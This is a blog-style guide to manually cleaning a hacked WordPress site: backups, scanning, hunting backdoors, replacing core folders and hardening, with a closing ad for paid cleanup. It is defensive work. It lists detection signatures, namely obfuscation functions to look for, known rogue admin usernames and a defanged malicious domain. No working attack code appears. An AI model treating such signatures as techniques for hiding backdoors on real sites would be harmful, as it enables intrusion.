WordPress Malware Removal: How to Manually Clean Your Hacked Site

Is your website redirecting to spam? Did your hosting provider suspend your account?

If you are reading this, you are likely in panic mode. Seeing your hard work compromised by hackers is stressful. Most generic advice on the internet will tell you to “just install a security plugin.”

While plugins are great for prevention, they often fail to clean a site that is already hacked. Advanced malware hides in your database, disguises itself as legitimate system files, or regenerates itself after you delete it.

In this guide, I will walk you through the Manual Core Refresh Protocol. This is the industry-standard method for cleaning file-based infections without breaking your site.

Step 1: Backup Before You Touch Anything

Do not skip this step.

We are about to modify core files and delete folders. If you make a mistake (like accidentally deleting your wp-config.php file), you could crash your site permanently. Even a backup of a hacked site is better than no backup at all—it gives you a safety net.

If you still have access to your WordPress dashboard, use a reliable plugin to save your data immediately:

• The Standard Method: UpdraftPlus is the industry standard for automated backups. Follow my guide on How to Back Up Your WordPress Site with UpdraftPlus (Step-by-Step 2025).
• The Migration Method: If you want a single-file export that is easy to move to a local environment for safe cleaning, check out How to Use All-in-One WP Migration to Back Up & Migrate Your Site.

Once your data is safe, we can start the surgery.

Step 2: Scan and Stop the Bleeding

Before you start deleting files, you need to know what you are dealing with. You must confirm if this is a plugin conflict or an actual infection.

External Check

First, see how the world views your site. Use a free tool like Sucuri SiteCheck & Virustotal to see if you are blacklisted by Google, McAfee, or Norton. This will tell you if your visitors are seeing a “Deceptive Site Ahead” warning.

Internal Scan

Install the free version of Wordfence. Go to Scan → Start New Scan.

Wordfence is excellent at comparing your core WordPress files against the official repository. It will highlight files that have been modified by hackers.

Step 3: Hunt Down Hidden Backdoors

Hackers don’t just break in once; they leave “keys” under the mat so they can come back later. These are called backdoors.

Check Your Source Code

Malware often hides in your theme’s header.php or footer.php files. You are looking for code that looks like random gibberish (obfuscated code). Look for suspicious functions like:

• eval
• base64_decode
• gzinflate

Check for Rogue Admin Users

Navigate to Users → All Users.

Hackers often create hidden administrator accounts to regain access. Look for usernames like:

• wp-support
• admin123
• 100100
• adm1nlxg1n
• adminbackup

If you see an administrator you didn’t create, delete it immediately.

Step 4: The Fix (Clean Core Files)

This is the most critical step. Instead of trying to pick out the malware line-by-line, we are going to replace your core system files with fresh, clean copies.

Warning: Follow these instructions carefully. One wrong click can delete your images or configuration.

1. Download Fresh WordPress: Go to WordPress.org and download the latest .zip file. Extract it on your computer.
2. Connect via FTP: Use a tool like FileZilla or your hosting File Manager.
3. The Purge: inside your server directory, DELETE the /wp-admin and /wp-includes folders.
4. The Protection: DO NOT delete the /wp-content folder (this holds your uploads and themes) and DO NOT delete wp-config.php (this connects your site to the database).
5. The Refresh: Upload the clean /wp-admin and /wp-includes folders from the fresh zip file you downloaded earlier.

This process eliminates 80% of file-based malware instantly because you are physically removing the infected system files and replacing them with sterile ones.

Step 5: Troubleshooting Specific Symptoms

The Core Refresh fixes the foundation, but malware often infects specific plugins, themes, or creates ghost files. Depending on your symptoms, check these specific guides I have written:

1. Is your site redirecting to other websites?

This is the most common symptom. Hackers inject JavaScript to send your traffic to scam sites or spam pages.

• If your site is sending users to a “getfix” domain, read my guide on Detecting and Removing getfix[.]win Redirects.
• If you see content from completely different websites appearing on yours, check out Why Is My Website Showing Content From Another Site?.
• Sometimes, the redirection logic is hidden deep in your server settings. Here is how to handle Redirections Hidden in .htaccess files.

2. Do you have strange files or backdoors?

If the malware keeps returning, you likely missed a backdoor file.

• Hackers often hide backdoors in fake plugins. A common one recently is the WP-Compat Plugin Backdoor.
• Sometimes they hide in your uploads folder disguised as legitimate files. Learn how to spot Cookie-Based PHP Backdoors.
• Are you seeing a user named “admnlxgxn”? This is a specific signature of a known hack. Here is how to spot and clean it.

3. Are you a victim of SEO Spam?

This is when hackers inject thousands of pages into your site to sell fake products (often in Japanese or pharma keywords).

• If your search results are filled with Japanese characters, read my Complete Guide to the Japanese Keyword Hack.
• We recently cleared 242,000 spam pages from a single site. Read the case study on Recovering from SEO Spam here.
• You might also find hidden links buried in your text meant to boost the hacker’s SEO rankings. Here is the guide to Hidden Links Malware.

4. JavaScript and AdSense Infections

Modern malware often targets your visitors’ browsers directly using malicious JavaScript.

• If your visitors are complaining about pop-ups or mobile redirects, you might be dealing with Dangerous JavaScript Malware.
• Sometimes malicious scripts infect every single .js file on your server. Here is a Step-by-Step Virus Removal Guide for infected .js files.
• Running ads? Watch out for Fake Google AdSense Malware that steals your ad revenue.

---

5. Domain Deactivation & Drive-By Warnings

Sometimes the issue isn’t just a redirect; your domain registrar might actually suspend your domain to protect the public from “Drive-By” downloads (malware that downloads automatically to a visitor’s computer).

• If you have received a suspension notice from a registrar like SWITCH (common for .ch and .li domains), or warnings about drive-by attacks, you need to act immediately to get back online.
• Read the fix: How to Remove “Drive-By” Malware & Fix a SWITCH Domain Deactivation Warning.Why Does Malware Keep Coming Back?

You cleaned the files, but the site got hacked again the next day. Why?

Usually, this is due to a Cron Job. Hackers set up a scheduled task on your server that automatically re-downloads the virus if you delete it. I explain exactly how this works in my post: Why Malware Keeps Coming Back (Hidden Cron Job Hack Explained).

Final Thoughts: Security Hardening

Once your files are clean, you must lock the doors.

1. Update Everything: WordPress core, themes, and plugins.
2. Change Passwords: Database, FTP, and WordPress Admin.
3. Check WooCommerce: If you run a store, ensure your checkout page wasn’t capturing credit card data. Read about WooCommerce Checkout Malware here.

Don’t want to touch the code?

Deleting core files can be scary. One wrong move can take your site offline permanently. If you are uncomfortable using FTP or editing PHP files, I can handle the full manual cleanup and security hardening for you.

👉 Hire Me for Manual Malware Removal (Fixed Price)